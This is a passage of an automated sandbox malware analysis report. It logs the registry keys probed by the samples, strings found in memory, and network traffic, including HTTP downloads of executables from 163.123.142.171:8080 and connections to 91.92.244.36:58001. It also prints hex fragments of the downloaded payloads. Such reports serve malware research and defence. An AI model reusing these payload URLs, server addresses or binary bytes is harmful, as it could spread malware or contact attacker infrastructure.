Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xddtyli.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Networking

barindex
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: Joe Sandbox View ASN Name: ILIGHT-NETUS ILIGHT-NETUS
Source: global traffic HTTP traffic detected: GET /file/1699834997-Prvrec.exe HTTP/1.1Host: 163.123.142.171:8080Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699835572-explorer.exe HTTP/1.1Host: 163.123.142.171:8080Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/1699833590-plugin3.dll HTTP/1.1Host: 163.123.142.171:8080
Source: Joe Sandbox View IP Address: 163.123.142.171 163.123.142.171
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''1699834997-Prvrec.exeContent-Length: 643072Content-Type: application/octet-streamLast-Modified: Mon, 13 Nov 2023 00:23:17 GMTDate: Tue, 21 Nov 2023 03:47:05 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 99 1b 32 90 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 c8 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 5c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 2c 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 c7 09 00 00 20 00 00 00 c8 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c 05 00 00 00 00 0a 00 00 06 00 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 44 21 00 00 20 0b 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 04 00 a9 00 00 00 01 00 00 11 20 d2 ba 09 00 8d 19 00 00 01 25 d0 02 00 00 04 28 11 00 00 0a 73 12 00 00 0a 0a 1a 8d 19 00 00 01 0b 06 07 16 1a 6f 13 00 00 0a 26 07 16 28 14 00 00 0a 0c 06 16 73 15 00 00 0a 0d 08 8d 19 00 00 01 13 04 09 11 04 16 08 6f 13 00 00 0a 26 11 04 28 01 00 00 2b 28 02 00 00 2b 28 18 00 00 0a 13 05 11 05 72 01 00 00 70 6f 19 00 00 0a 13 06 d0 22 00 00 01 28 1a 00 00 0a 11 06 72 4d 00 00 70 28 1b 00 00 0a 16 8d 10 00 00 01 6f 1c 00 00 0a 26 de 14 09 2c 06 09 6f 1d 00 00 0a dc 06 2c 06 06 6f 1d 00 00 0a dc 2a 00 00 00 01 1c 00 00 02 00 3c 00 58 94 00 0a 00 00 00 00 02 00 1b 00 83 9e 00 0a 00 00 00 00 1a 7e 01 00 00 04 2a 1e 02 28 1e 00 00 0a 2a 56 73 03 00 00 06 28 1f 00 00 0a 74 03 00 00 02 80 01 00 00 04 2a 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 74 03 00 00 23 7e 00 00 e0 03 00 00 ec 04 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 cc 08 00 00 64 00 00 00 23 55 5
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''1699835572-explorer.exeContent-Length: 604672Content-Type: application/octet-streamLast-Modified: Mon, 13 Nov 2023 00:32:52 GMTDate: Tue, 21 Nov 2023 03:47:18 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 ab e1 a0 ab 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 32 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 74 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 2b 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 30 09 00 00 20 00 00 00 32 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 74 05 00 00 00 60 09 00 00 06 00 00 00 34 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 50 21 00 00 e8 09 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 73 04 00 00 06 28 03 00 00 06 2a 2e 28 05 00 00 06 28 10 00 00 0a 2a 13 30 06 00 34 00 00 00 01 00 00 11 02 28 02 00 00 06 74 16 00 00 01 72 01 00 00 70 6f 11 00 00 0a 0a 06 14 28 12 00 00 0a 2c 14 06 72 51 00 00 70 20 00 01 00 00 14 14 14 6f 13 00 00 0a 26 2a 1e 02 28 14 00 00 0a 2a 1b 30 04 00 76 00 00 00 02 00 00 11 20 24 25 09 00 8d 19 00 00 01 25 d0 01 00 00 04 28 15 00 00 0a 73 16 00 00 0a 0a 1a 8d 19 00 00 01 0b 06 07 16 1a 6f 17 00 00 0a 26 07 16 28 18 00 00 0a 0c 06 16 73 19 00 00 0a 0d 08 8d 19 00 00 01 13 04 09 11 04 16 08 6f 17 00 00 0a 26 11 04 28 01 00 00 2b 28 02 00 00 2b 13 05 de 14 09 2c 06 09 6f 1c 00 00 0a dc 06 2c 06 06 6f 1c 00 00 0a dc 11 05 2a 00 00 01 1c 00 00 02 00 3c 00 23 5f 00 0a 00 00 00 00 02 00 1b 00 4e 69 00 0a 00 00 00 00 1e 02 28 14 00 00 0a 2a 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 48 03 00 00 23 7e 00 00 b4 03 00 00 50 04 00 00 23 53 74 72 69 6e 67 73 00 00
Source: global traffic TCP traffic: 192.168.2.6:49709 -> 91.92.244.36:58001
Source: global traffic TCP traffic: 192.168.2.6:49710 -> 163.123.142.171:8080
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.244.36
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: unknown TCP traffic detected without corresponding DNS query: 163.123.142.171
Source: powershell.exe, 00000002.00000002.2491503196.0000029DE4013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2646332508.00000270D6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: xddtyli.exe, 00000009.00000002.2809050609.000001EEBF9C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.m
Source: xddtyli.exe, 00000009.00000002.2975467324.000001EEBFD70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2179820229.0000029DD3FA1000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.0000000003D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6701000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2278949383.000001EEA73F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237253D1000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.2754160353.00000000036AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD41C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2179820229.0000029DD3FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2185219246.00000270C6701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2334928126.00000237253D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2334928126.00000237255F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB78A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.2491503196.0000029DE4013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2646332508.00000270D6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3527531392.0000023735444000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: e2kLb2J2Y7.exe, 00000000.00000002.2113076611.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2118028441.000000001C660000.00000004.08000000.00040000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000014061000.00000004.00000800.00020000.00000000.sdmp, e2kLb2J2Y7.exe, 00000000.00000002.2115249580.0000000013EB9000.00000004.00000800.00020000.00000000.sdmp, Key.exe, 00000004.00000002.2152846444.0000000003D71000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7893000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2371258222.000001EEB7845000.00000004.00000800.00020000.00000000.sdmp, xddtyli.exe, 00000009.00000002.2278949383.000001EEA70C1000.00000004.00000800.00020000.00000000.sdmp, Values.exe, 0000000C.00000002.2342145252.000002326752E000.00000004.00000800.00020000.00000000.sdmp, zhtyxulkfny.exe, 00000011.00000002.2754160353.0000000003581000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
